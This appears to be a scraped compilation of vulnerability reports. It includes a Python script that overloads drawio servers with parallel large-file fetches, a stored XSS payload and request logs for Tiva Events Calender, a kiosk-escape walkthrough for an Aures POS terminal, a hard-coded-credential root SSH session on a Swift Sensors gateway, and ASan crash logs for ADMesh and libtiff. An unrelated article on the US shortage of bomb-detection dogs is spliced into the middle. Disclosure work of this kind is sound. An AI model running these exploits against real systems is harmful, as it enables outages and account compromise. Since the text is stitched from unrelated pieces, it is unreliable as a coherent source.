Denial of Service in GitHub repository jgraph/drawio prior to 18.1.3.

**Description**

consider following script

**exploit.py**

put drawio\_docker\_instace your address and also big\_file\_address should be serve a big image file ( > 250 MB)

    from multiprocessing import Process
    import requests
    
    def fun():
        try:
           requests.get("http://drawio_docker_instace/embed2.js?fetch=http://big_file_address/1.jpg")
           #requests.get("http://drawio_docker_instace/proxy?url=http://big_file_address/1.jpg")
           print("OK")
        except:
            print("error from server")
    
    def main():
        for i in range(1,40):
            p = Process(target=fun, args=())
            p.start()
    
    if __name__ == '__main__':
        main()
    

I upload forty 250MB photos at the same time, and the server hangs up ( I test it on upcloud basic server plan) both /proxy and /embed2.js was vulnerable to DOS and /embed2.js was more vulnerable as I saw in docker status you can check it yourself with my POC.py file

**Proof of Concept**

The POC is for the /embed2.js endpoint and for the /proxy endpoint we should increase the number of simultaneously Processes https://drive.google.com/file/d/1p52S-Rcp0p_5od8NUtz4DHpte4EZj6Ks/view?usp=sharing

**Impact**

High damage on Availability of server, In my tests the docker instance was stopped working. because the drawio ran on the same docker of the mentioned methods, then the whole application can be damaged by this attack. So I prefer set the availability of CVSS to high

CVE-2023-3398: proxying Big files leads to potential DOS in drawio

Finding high-quality detection canines is hard enough—and the pandemic only dug a deeper hole.

The Covid-19 pandemic played a key role in the global supply chain logjam of the past 18 months that has disrupted commerce and fueled a cost-of-living crisis around the world. And it seems no pipeline has escaped its impact. After years of trying to raise awareness about a shortage of dogs with the necessary genetic, physical, and emotional attributes to work as bomb-detection canines in the United States, experts say that pandemic-related turmoil has further complicated the situation.

The US sources 85 to 90 percent of its detection canines from overseas, particularly from European countries like Germany and the Netherlands. Dogs receive advanced training in a number of subspecialties, including bomb and drug detection and search and rescue. But breeding, genetics, environment, and training during early life are all crucial to producing dogs with the mental and physical characteristics to protect them on the job and enable a good quality of life. 

“The canine nose is the best technology we have for locating explosives, so we need to have a very consistent and high-quality source of dogs,” says Sheila Goffe, vice president of government relations at the American Kennel Club. “We used to talk about, ‘Well, what if there’s a global crisis or geopolitical issues, we’re not going to be able to get all of these dogs we’re importing from Europe,’ and then it happened.”

In congressional testimony in March 2016, Cindy Otto, executive director of the Penn Vet Working Dog Center at the University of Pennsylvania, warned the Senate Homeland Security Committee about these risks. “By outsourcing our national security requirements, we give up control of the type of dogs, the health of the dogs, and the early training of the dogs,” she said at the time. “We also are at risk for supply interruption due to politics, disaster, or disease.”

Today, she says she sees progress toward growing the domestic supply of detection dogs in the US. Expanded federal contracts for projects at Johns Hopkins Advanced Physics Laboratory, Auburn University, Gallant Technologies, K2 Solutions, and others are aimed at developing new technologies and procedures to support a larger network for breeding domestic detection dogs. And programs like the American Kennel Club’s “Patriotic Puppy Program” are working to teach existing US breeders about the requirements and criteria for specifically focusing on detection dogs. But she adds that progress has been incremental and will take years of foundational work to bear fruit.

“I wish we were way further along, but certainly the pandemic slowed the research down, slowed all the programs down,” Otto told WIRED. “It restricted the inflow of dogs from overseas and slowed progress in this country to establish alternatives—it just beat us all up.”

Last month, the US Government Accountability Office (GAO) released a nearly 100-page report about working dogs and the need for federal agencies to better safeguard their health and wellness. The GOA says that as of February the US federal government had approximately 5,100 working dogs, including detection dogs, across three federal agencies. Another 420 dogs “served the federal government in 24 contractor-managed programs within eight departments and two independent agencies,” the GAO report says.

The report also underscores the demands placed on detection dogs and the potential for overwork if there aren’t enough dogs available. “Working dogs might need the strength to suddenly run fast, or to leap over a tall barrier, as well as the physical stamina to stand or walk all day,” the report says. “They might need to search over rubble or in difficult environmental conditions, such as extreme heat or cold, often wearing heavy body armor. They also might spend the day detecting specific scents among thousands of others, requiring intense mental concentration. Each function requires dogs to undergo specialized training.”

As institutions emerge from pandemic restrictions, they are scrambling to make up lost time on two equally important components of the problem: developing procedures for reliably producing successful detection dogs and actually breeding and raising puppies. Auburn University focuses on the former.

“At Auburn, we were fortunate that the pandemic did not force us to stop doing research altogether, but we were affected by scheduling issues, supply chain issues, all the things that slow the pace of progress down,” says Skip Bartol, associate dean of research and graduate studies at the Auburn University College of Veterinary Medicine. “There is not yet a road map to a complete solution to domestic sourcing for detection dogs, but what we are trying to do is establish best scientific practices—everything from making sound genetic decisions about the breeding of detector canines to their development as puppies to how early environment affects their lifelong potential.”

Problems with procurement and breeding during the pandemic mean that the population of bomb dogs working in the US right now may be aging and stretched even more than usual. And the bottom line is that the US is still heavily reliant on procuring detection dogs from other countries. As the University of Pennsylvania’s Otto puts it, “It’s a combination of factors, but there is definitely still a very unmet need.”

The US Has a Bomb-Sniffing Dog Shortage

Zoho ManageEngine ServiceDesk Plus before 12003 allows authentication bypass in certain admin configurations.

CVE-2021-44526: ServiceDesk Plus readme | Service desk release notes | ServiceDesk Plus latest version read me notes | IT service management release notes | Service desk current version

Tiva Events Calender version 1.4 suffers from a persistent cross site scripting vulnerability.

Document Title:  
===============  
Tiva Events Calender v1.4 - Cross Site Scripting Vulnerability

References (Source):  
====================  
https://www.vulnerability-lab.com/get_content.php?id=2276

Release Date:  
=============  
2023-07-05

Vulnerability Laboratory ID (VL-ID):  
====================================  
2276

Common Vulnerability Scoring System:  
====================================  
5

Vulnerability Class:  
====================  
Cross Site Scripting - Persistent

Current Estimated Price:  
========================  
500€ - 1.000€

Product & Service Introduction:  
===============================  
Events Calendar For PHP is a powerful PHP calendar script that can be easily integrated and used with various PHP projects,  
such as scheduler, event handler, etc. The calendar is simple to install, deploy, and use. It is suitable for all types of  
service businesses to get online reservations without any hassles.

(Copy of the Homepage:https://codecanyon.net/item/tiva-events-calendar-for-php/19199337  )

Abstract Advisory Information:  
==============================  
The vulnerability laboratory core research team discovered a persistent script code inject vulnerability in the Tiva Events Calender v1.4 web-application.

Affected Product(s):  
====================  
tiva_theme  
Product: Tiva Events Calender - Calender PHP (Web-Application)

Vulnerability Disclosure Timeline:  
==================================  
2021-04-03: Researcher Notification & Coordination (Security Researcher)  
2021-04-04: Vendor Notification 1 (Security Department)  
2021-06-24: Vendor Notification 2 (Security Department)  
2021-07-13: Vendor Notification 3 (Security Department)  
****-**-**: Vendor Response/Feedback (Security Department)  
****-**-**: Vendor Fix/Patch (Service Developer Team)  
****-**-**: Security Acknowledgements (Security Department)  
2023-07-05: Public Disclosure (Vulnerability Laboratory)

Discovery Status:  
=================  
Published

Exploitation Technique:  
=======================  
Remote

Severity Level:  
===============  
Medium

Authentication Type:  
====================  
Restricted Authentication (User Privileges)

User Interaction:  
=================  
Low User Interaction

Disclosure Type:  
================  
Responsible Disclosure

Technical Details & Description:  
================================  
A persistent input validation web vulnerability has been discovered in the official Tiva Events Calender v1.4 web-application.  
The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser  
to web-application requests from the application-side.

The vulnerability is located in the name input field and name parameter. Remote attackers privileged user accounts are able to inject  
own malicious script codes as name. Thus results in a persistent execute of the script code in the backend on edit but as well in the  
frontend (index) were the event is being displayed after the submit (save) via post method request. In the same direction it is possible  
to inject malformed client-side executable script code in get request to trigger a non-persistent execution.

Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects  
to malicious source and persistent manipulation of affected frontend / backend application modules.

Request Method(s):  
[+] POST / GET

Vulnerable Input(s):  
[+] Name

Vulnerable Parameter(s):  
[+] name

Affected Module(s):  
[+] index.php (Frontend on Event Preview)  
[+] edit.php (Backend on Edit ID)

Proof of Concept (PoC):  
=======================  
The persistent input validation web vulnerability can be exploited by remote attackers with low privileged user account and with low user interaction.  
For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.

Exploitation: Payload  
%20"<img src="evil.source" onload=alert(document.domain)>

Vulnerable Source: Frontend (Index)  
<tr><td class="calendar-day-normal"><span class="calendar-day-weekend">8</span></td>  
<td class="calendar-day-normal"><div class="calendar-day-file">9<div class="calendar-file-name color-4" onclick="downloadFile(220)">  
<span class="event-name">event1"%20"<img src="evil.source" onload=alert(document.domain)></span></div></div></td><td class="calendar-day-normal">10</td>  
<td class="calendar-day-normal">11</td><td class="calendar-day-normal">12</td><td class="calendar-day-normal">13</td>  
<td class="calendar-day-normal"><span class="calendar-day-weekend">14</span></td></tr>

Vulnerable Source: Backend (Edit ID)  
<section class="panel">  
<header class="panel-heading"><i class="fa fa-folder-open"></i> Edit File</header>  
<div class="panel-body">  
<div class="alert alert-success">  
<button data-dismiss="alert" class="close close-sm" type="button">  
<i class="fa fa-times"></i>  
</button>Report successfully saved.</div>    
<form class="form-horizontal" action="edit.php?id=220" method="post" enctype="multipart/form-data">  
<div class="form-group">  
<label class="col-lg-2 col-sm-2 control-label">Name<span class="star">&nbsp;*</span></label>  
<div class="col-sm-8">  
<input type="text" name="name" class="form-control" value="event1"%20"<img src="evil.source" onload=alert(document.domain)>" required />  
</div></div>

--- PoC Session Logs (POST) ---  
https://tiva-cal.localhost:8080/admin/report/edit.php  
Host: tiva-cal.localhost:8080  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Content-Type: multipart/form-data; boundary=---------------------------249785717017581481612148649683  
Content-Length: 745  
Origin:https://tiva-cal.localhost:8080  
Connection: keep-alive  
Referer:https://tiva-cal.localhost:8080/admin/report/edit.php  
Cookie: PHPSESSID=76gqk14e1s6cce40hfj11  
name="%20%20"<img src="evil.source" onload=alert(document.domain)>&type=1&time=20-08-2021&file=temp.txt&save=  
-  
POST: HTTP/2.0 200 OK  
server: nginx  
content-type: text/html  
content-length: 1283  
etag: "503-53ed12f4ca761"  
accept-ranges: bytes  
strict-transport-security: max-age=15768000; includeSubDomains  
-  
https://tiva-cal.localhost:8080/admin/report/evil.source  
Host: tiva-cal.localhost:8080  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0  
Accept: image/webp,*/*  
Connection: keep-alive  
Referer:https://tiva-cal.localhost:8080/admin/report/edit.php?id=222  
Cookie: PHPSESSID=76gqk14e1s6cce40hfj11  
-  
GET: HTTP/2.0 200 OK  
server: nginx  
content-type: text/html  
content-length: 1283  
etag: "503-53ed12f4ca761"  
accept-ranges: bytes  
strict-transport-security: max-age=15768000; includeSubDomains

Solution - Fix & Patch:  
=======================  
The vulnerability can be patched by the following steps ...  
1. Encode and escape the name input field content on transmit via post method  
2. Restrict the input field and disallow insert of special chars  
3. Parse the output location on the index frontend via encode to sanitize and prevent the execute  
4. Parse the output location on the edit id report backend via encode to sanitize and prevent the execute

Security Risk:  
==============  
The security risk of the persistent input validation vulnerability in the web-application is estimated as medium.

Credits & Authors:  
==================  
Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab

Disclaimer & Information:  
=========================  
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,  
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab  
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits  
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do  
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.  
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:www.vulnerability-lab.com    www.vuln-lab.com        www.vulnerability-db.com

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.  
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other  
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other  
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or  
edit our material contact (admin@ or research@) to get a ask permission.

            Copyright © 2023 | Vulnerability Laboratory - [Evolution Security GmbH]™

--   
VULNERABILITY LABORATORY (VULNERABILITY LAB)  
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

Tiva Events Calender 1.4 Cross Site Scripting

Aures Booking and POS Terminal suffers from a local privilege escalation vulnerability.

Document Title:  
===============  
Aures Booking & POS Terminal - Local Privilege Escalation

References (Source):  
====================  
https://www.vulnerability-lab.com/get_content.php?id=2323

Release Date:  
=============  
2023-07-17

Vulnerability Laboratory ID (VL-ID):  
====================================  
2323

Common Vulnerability Scoring System:  
====================================  
7.2

Vulnerability Class:  
====================  
Privilege Escalation

Current Estimated Price:  
========================  
3.000€ - 4.000€

Product & Service Introduction:  
===============================  
KOMET is an interactive, multifunctional kiosk and specially designed for the fast food industry. Available as a wall-mounted or  
freestanding model, its design is especially adapted to foodservice such as take-aways or fast food in system catering. The kiosk  
features a 27 YUNO touch system in portrait mode, an ODP 444 thermal receipt printer, a payment terminal and a 2D barcode scanner.  
With a click, the customer selects, books, orders, purchases and pays directly at the kiosk. The system offers the possibility to  
manage customer cards and promotions. Queue management can also be optimized.

(Copy of the Homepage:https://aures.com/de/komet/  )

Abstract Advisory Information:  
==============================  
The vulnerability laboratory core research team discovered a local kiosk privilege escalation vulnerability in the operating system of  
the Aures Komet Booking & POS Terminal (Windows 10 IoT Enterprise) used by the german company immergrün franchise gmbh.

Affected Product(s):  
====================  
Aures Technologies GmbH  
Product: Aures Komet Booking & POS Terminal - (KIOSK) (Windows 10 IoT Enterprise)

Vulnerability Disclosure Timeline:  
==================================  
2023-05-09: Researcher Notification & Coordination (Security Researcher)  
2023-07-17: Public Disclosure (Vulnerability Laboratory)

Discovery Status:  
=================  
Published

Exploitation Technique:  
=======================  
Local

Severity Level:  
===============  
High

Authentication Type:  
====================  
Open Authentication (Anonymous Privileges)

User Interaction:  
=================  
No User Interaction

Disclosure Type:  
================  
Responsible Disclosure

Technical Details & Description:  
================================  
A kiosk mode escalation vulnerability has been discovered in the operating system of the Aures Komet Booking & POS Terminal  
(Windows 10 IoT Enterprise) used by the german company immergrün franchise gmbh. The security vulnerability allows local attackers  
to bypass the kiosk mode to compromise the local file system and applications.

It is possible for local attackers to escalate out of the kiosk mode in the aures komet booking & pos terminal. Local attackers are  
able to use the touch functionalities in the aures komet booking & pos terminal system to escalate with higher privileges. The security  
vulnerability is located in the context menu function of the extended menu on touch interaction. Attackers with restricted low local  
privileged access to the booking service front display are able to execute files, can unrestricted download contents or exfiltrate  
local file-system information of the compromised windows based operating system.

No keyboard or connections are required to manipulate the service booking and payment terminal. The booking and payment terminal system  
vulnerability requires no user user interaction to become exploited and can only be triggered by local physical device access.

Vulnerable Operating System(s):  
[+] Windows 10 (IoT Enterprise)

Affected Component(s):  
[+] Context Menu

Affected Function(s):  
[+] Web Search  
[+] Share (Teilen)

Proof of Concept (PoC):  
=======================  
The local vulnerability can be exploited by local attackers with physical device access without user interaction.  
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

PoC: Sheet  
Touch Display => Select Food Item => Highlight Text  
=> Open Context Menu => Extend Context Menu => Web-Search  
=> Browser => Local File System => Compromised!

Manual steps to reproduce the vulnerability ...  
01.  First touch the monitor display to move on from standby  
02.  Select an food item from the menu of immergrün (we recomment the cesar wraps)  
03.  Push the information button of the selected food item  
04.  Push twice via touch to mark the selected food item text  
05.  Press a third time after you have marked the context by holding it down on the touch display  
06.  Now the function context menu of the operating system for highlighted text appears  
07.  On the context menu appearing 3 dots to extend the visible function menu  
08.  Select the web-search or share function for the highlighted content in the context menu  
09.  The browser of the operating system opens on the main front screen  
10.1 By now you are able to download an execute executables using the browser without any blacklisting (Unrestricted Web Access - Download of Files)  
10.2 Attackers can open websites on the fron display to manipulate the visible content (Scam & Spam - Web Messages & Web Context)  
10.3 Attackers are able to manipulate via browser debugger the web content displayed from immergrün (Phishing - Formular & Banking Information)  
10.4 Attackers are able to access the local file system and compromise it by reconfiguration with privileged user account (Local File-System - Privilege Escaltion)  
10.5 Attackers are able to infect the local operating system with ransomware or other malicious programs and scripts (Malware - Ransomware, Keylogger, Trojan-Banking & Co.)  
10.6 Attackers are able to exfiltrate data from the local computer system using web connecting and available protocols  
10.7 Attackers are able to perform man in the middle attacks from the local computer system  
11.0 Successful reproduce of the security vulnerability!

Reference(s): Pictures  
- 1.png (Terminal A)  
- 2.png (Terminal B)  
- 3.png (Escape)  
- 4.png (Awareness)

Solution - Fix & Patch:  
=======================  
The security vulnerabilities can be patched by following steps:  
1.  Disable the content menu to extend  
2.  Disable the context menu  
3.  Disable web-search  
4.  Disable to mark text inputs & texts  
5.  Disallow to open not white listed websites  
6.  Disable to download files  
7.  Restrict the web-browser access  
8.  Disallow the file browser  
9.  Disable the browser debug modus  
10. Reconfigure the local firewall to allow and disallow connections  
11. Change the access permission to prevent exfiltration

Security Risk:  
==============  
The security risk of the vulnerability in the local booking and payment terminal system is considered high.  
The issue can be easily exploited by local attackers with simple interaction via the touch display.  
Once compromised, the attackers can fully manipulate the computer's operating system and use it misuse  
it for further simple or more complex attack scenarios.

Credits & Authors:  
==================  
Benjamin Mejri (Kunz)   -https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.  
Lars Guenther     -https://www.vulnerability-lab.com/show.php?user=L.+Guenther

Disclaimer & Information:  
=========================  
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,  
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab  
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits  
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do  
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.  
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:   https://www.vulnerability-lab.com  ;  https://www.vuln-lab.com  ;https://www.vulnerability-db.com

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.  
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other  
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other  
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or  
edit our material contact (admin@ or research@) to get a ask permission.

            Copyright © 2023 | Vulnerability Laboratory - [Evolution Security GmbH]™

--   
VULNERABILITY LABORATORY (VULNERABILITY LAB)  
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

Aures Booking And POS Terminal Local Privilege Escalation

ADMesh through 0.98.4 has a heap-based buffer over-read in stl_update_connects_remove_1 (called from stl_remove_degenerate) in connect.c in libadmesh.a.

Find a heap-buffer-overflow with the input. Hope this report is helpful.

    ADMesh version 0.99.0dev, Copyright (C) 1995, 1996 Anthony D. Martin
    ADMesh comes with NO WARRANTY.  This is free software, and you are welcome to
    redistribute it under certain conditions.  See the file COPYING for details.
    Opening 0
    Checking exact...
    Checking nearby. Tolerance= 3.937008 Iteration=1 of 2...  Fixed 2 edges.
    Checking nearby. Tolerance= 196854.328125 Iteration=2 of 2...  Fixed 0 edges.
    Removing unconnected facets...
    =================================================================
    ==29577==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x610000000030 at pc 0x7f791f89fefe bp 0x7fffd3395da0 sp 0x7fffd3395d98
    READ of size 4 at 0x610000000030 thread T0
        #0 0x7f791f89fefd in stl_update_connects_remove_1 /home/t/Projects/afl/fuzzing-experiments/subjects/admesh/src/connect.c:831:9
        #1 0x7f791f89fefd in stl_remove_degenerate /home/t/Projects/afl/fuzzing-experiments/subjects/admesh/src/connect.c:796
        #2 0x7f791f89fefd in stl_remove_unconnected_facets /home/t/Projects/afl/fuzzing-experiments/subjects/admesh/src/connect.c:728
        #3 0x7f791f8cf622 in stl_repair /home/t/Projects/afl/fuzzing-experiments/subjects/admesh/src/util.c:527:7
        #4 0x51a148 in main /home/t/Projects/afl/fuzzing-experiments/subjects/admesh/src/admesh.c:303:3
        #5 0x7f791e8dab96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
        #6 0x41af79 in _start (/home/t/Projects/afl/fuzzing-experiments/subjects/admesh/.libs/admesh+0x41af79)
    
    0x610000000030 is located 16 bytes to the left of 192-byte region [0x610000000040,0x610000000100)
    allocated by thread T0 here:
        #0 0x4e382f in calloc /home/t/Projects/lldb-testing/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:155
        #1 0x7f791f8b5239 in stl_allocate /home/t/Projects/afl/fuzzing-experiments/subjects/admesh/src/stlinit.c:185:26
        #2 0x7f791f8b5239 in stl_open /home/t/Projects/afl/fuzzing-experiments/subjects/admesh/src/stlinit.c:42
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /home/t/Projects/afl/fuzzing-experiments/subjects/admesh/src/connect.c:831:9 in stl_update_connects_remove_1
    Shadow bytes around the buggy address:
      0x0c207fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c207fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c207fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c207fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c207fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0c207fff8000: fa fa fa fa fa fa[fa]fa 00 00 00 00 00 00 00 00
      0x0c207fff8010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c207fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c207fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c207fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c207fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==29577==ABORTING

CVE-2018-25033: heap-buffer-flow in stl_update_connects_remove_1 · Issue #28 · admesh/admesh

An authentication bypass vulnerability exists in the device password generation functionality of Swift Sensors Gateway SG3-1010. A specially-crafted network request can lead to remote code execution. An attacker can send a sequence of requests to trigger this vulnerability.

**Summary**

An authentication bypass vulnerability exists in the device password generation functionality of Swift Sensors Gateway SG3-1010. A specially-crafted network request can lead to remote code execution. An attacker can send a sequence of requests to trigger this vulnerability.

**Tested Versions**

Swift Sensors Gateway SG3-1010

**Product URLs**

Swift Sensors Gateway - https://www.swiftsensors.com/catalog/gateways/sg3-1010/

**CVSSv3 Score**

10.0 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

**CWE**

CWE-798 - Use of Hard-coded Credentials

**Details**

The Swift Sensors Gateway 1010 connects with all Series 3 Swift Sensors within range and securely transmits sensor data to the Swift Sensors Cloud through either Wi-Fi, Ethernet or Cellular (Swift Sensors Cellular Network Module Required).

While typical installation and usage does not require a user to login to the device itself, a `SSH` service can be found running on the device by default. This service is not required for standard operation and is not mentioned in the provided documentation, nor are any sort of login credentials.

However, upon analysis of the device firmware, we were able to determine their unique password generation mechanism for each device. This password is based off of the exposed `Gateway ID` printed boldly on the front of each gateway. This ID consists of 8 alphanumeric characters that are used in a substitution & encoding process that is eventually AES encrypted and base64 encoded. The base64 encoded value along with the username `pi` (this is a Raspberry Pi device with a customized ‘HAT’ for receiving sensor data), allows any user on the network (or if the gateway is exposed to the internet) that knows or can see the printed `Gateway ID` to login to the device using the exposed `SSH` service. From there, a user can `sudo su` straight to the `root` user.

Also of note is that the device ID and password combination is used by the Swift Sensor bridge software itself to login to the backend to report sensor data. This could potentially allow a remote user to manipulate data and/or disable sensor reporting altogether. Additionally, our research indicates that only the last 4 characters differ between bridge IDs using only capital letters and/or numbers. This small keyspace (36^4) means that an attacker could in theory, brute-force each possible device ID and password combination to login to the backend sensor data endpoint as those devices.This is particularly critical considering the sensor package we were sold is designed specifically for monitoring Moderna vaccine equipment.

**Exploit Proof of Concept**

$ ssh pi@192.168.1.223 pi@192.168.1.223’s password: Linux WBERN3-01-AYM6LWFB 5.4.81-v7l+ #1378 SMP Mon Dec 7 18:43:09 GMT 2020 armv7l

The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/\*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Mon Nov 29 15:51:43 2021 from 192.168.1.224 pi@WBERN3-01-AYM6LWFB:~$ sudo su root@WBERN3-01-AYM6LWFB:/home/pi# whoami root root@WBERN3-01-AYM6LWFB:/home/pi# uname -a Linux WBERN3-01-AYM6LWFB 5.4.81-v7l+ #1378 SMP Mon Dec 7 18:43:09 GMT 2020 armv7l GNU/Linux root@WBERN3-01-AYM6LWFB:/home/pi#

**Timeline**

2021-12-14 - Vendor disclosure  
2021-12-14 - Initial vendor contact  
2022-02-02 - Vendor patched  
2022-02-28 - Public Release  

Discovered by Dave McDaniel of Cisco Talos.

CVE-2021-40422: TALOS-2021-1431 || Cisco Talos Intelligence Group

libtiff 4.5.0 is vulnerable to Buffer Overflow in uv_encode() when libtiff reads a corrupted little-endian TIFF file and specifies the output to be big-endian.

Skip to content

**Get started with Code Suggestions, available for free during the beta period.**

Code faster and more efficiently with AI-powered code suggestions in VS Code. 13 languages are supported, including JavaScript, Python, Go, Java, and Kotlin. Enable Code Suggestions in your user profile preferences or see the documentation to learn more.

*   libtiff
*   libtiff
*   Issues
*   #530

Open Issue created Feb 15, 2023 by **Tseng Szu Wei@13579and24680**

**SEGV at /libtiff/tif\_luv.c:961 in uv\_encode()**

**Summary**

An SIGSEGV caused when using tiffcrop.

**Version**

    $ ./tools/tiffcrop -v
    Library Release: LIBTIFF, Version 4.5.0
    Copyright (c) 1988-1996 Sam Leffler
    Copyright (c) 1991-1996 Silicon Graphics, Inc.
    Tiffcp code: Copyright (c) 1988-1997 Sam Leffler
               : Copyright (c) 1991-1997 Silicon Graphics, Inc
    Tiffcrop additions: Copyright (c) 2007-2010 Richard Nolde
    
    $ git log --oneline -1
    c861f25c (HEAD -> master, origin/master, origin/HEAD) Merge branch 'tiffcrop_dont_reuse_input_buffer_fix_527' into 'master'

**Steps to reproduce****make**

    git clone https://gitlab.com/libtiff/libtiff.git
    cd libtiff
    ./autogen.sh
    ./configure
    make

**run**

    $ ./tools/tiffcrop -B poc temp
    TIFFReadDirectoryCheckOrder: Warning, Invalid TIFF directory; tags are not sorted in ascending order.
    TIFFReadDirectory: Warning, Unknown field with tag 12336 (0x3030) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 3120 (0xc30) encountered.
    TIFFFetchNormalTag: Defined set_field_type of custom tag 12336 (Tag 12336) is TIFF_SETGET_UNDEFINED and thus tag is not read from file.
    TIFFFetchNormalTag: Defined set_field_type of custom tag 3120 (Tag 3120) is TIFF_SETGET_UNDEFINED and thus tag is not read from file.
    TIFFAdvanceDirectory: Error fetching directory count.
    fish: Job 1, './tools/tiffcrop -B poc temp' terminated by signal SIGSEGV (Address boundary error)

**Platform**

    $ uname -a
    Linux 13579 5.15.0-56-generic #62~20.04.1-Ubuntu SMP Tue Nov 22 21:24:20 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
    
    $ gcc --version
    gcc (Ubuntu 9.4.0-1ubuntu1~20.04.1) 9.4.0
    Copyright (C) 2019 Free Software Foundation, Inc.
    This is free software; see the source for copying conditions.  There is NO
    warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

**ASAN report**

    ./tools/tiffcrop -B poc temp
    TIFFReadDirectoryCheckOrder: Warning, Invalid TIFF directory; tags are not sorted in ascending order.
    TIFFReadDirectory: Warning, Unknown field with tag 12336 (0x3030) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 3120 (0xc30) encountered.
    TIFFFetchNormalTag: Defined set_field_type of custom tag 12336 (Tag 12336) is TIFF_SETGET_UNDEFINED and thus tag is not read from file.
    TIFFFetchNormalTag: Defined set_field_type of custom tag 3120 (Tag 3120) is TIFF_SETGET_UNDEFINED and thus tag is not read from file.
    TIFFAdvanceDirectory: Error fetching directory count.
    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==1381705==ERROR: AddressSanitizer: SEGV on unknown address 0x7f1876003420 (pc 0x7f1c75f78cb0 bp 0x7ffc95fdf630 sp 0x7ffc95fdf600 T0)
    ==1381705==The signal is caused by a READ memory access.
        #0 0x7f1c75f78caf in uv_encode /home/a13579/fuzz_lib_tiff/report/libtiff_asan/libtiff/tif_luv.c:961
        #1 0x7f1c75f797b2 in LogLuv24fromXYZ /home/a13579/fuzz_lib_tiff/report/libtiff_asan/libtiff/tif_luv.c:1057
        #2 0x7f1c75f79f58 in Luv24fromXYZ /home/a13579/fuzz_lib_tiff/report/libtiff_asan/libtiff/tif_luv.c:1120
        #3 0x7f1c75f76522 in LogLuvEncode24 /home/a13579/fuzz_lib_tiff/report/libtiff_asan/libtiff/tif_luv.c:569
        #4 0x7f1c75f775c7 in LogLuvEncodeStrip /home/a13579/fuzz_lib_tiff/report/libtiff_asan/libtiff/tif_luv.c:722
        #5 0x7f1c75fcb6bb in TIFFWriteEncodedStrip /home/a13579/fuzz_lib_tiff/report/libtiff_asan/libtiff/tif_write.c:308
        #6 0x563fd6857160 in writeBufferToContigStrips /home/a13579/fuzz_lib_tiff/report/libtiff_asan/tools/tiffcrop.c:1317
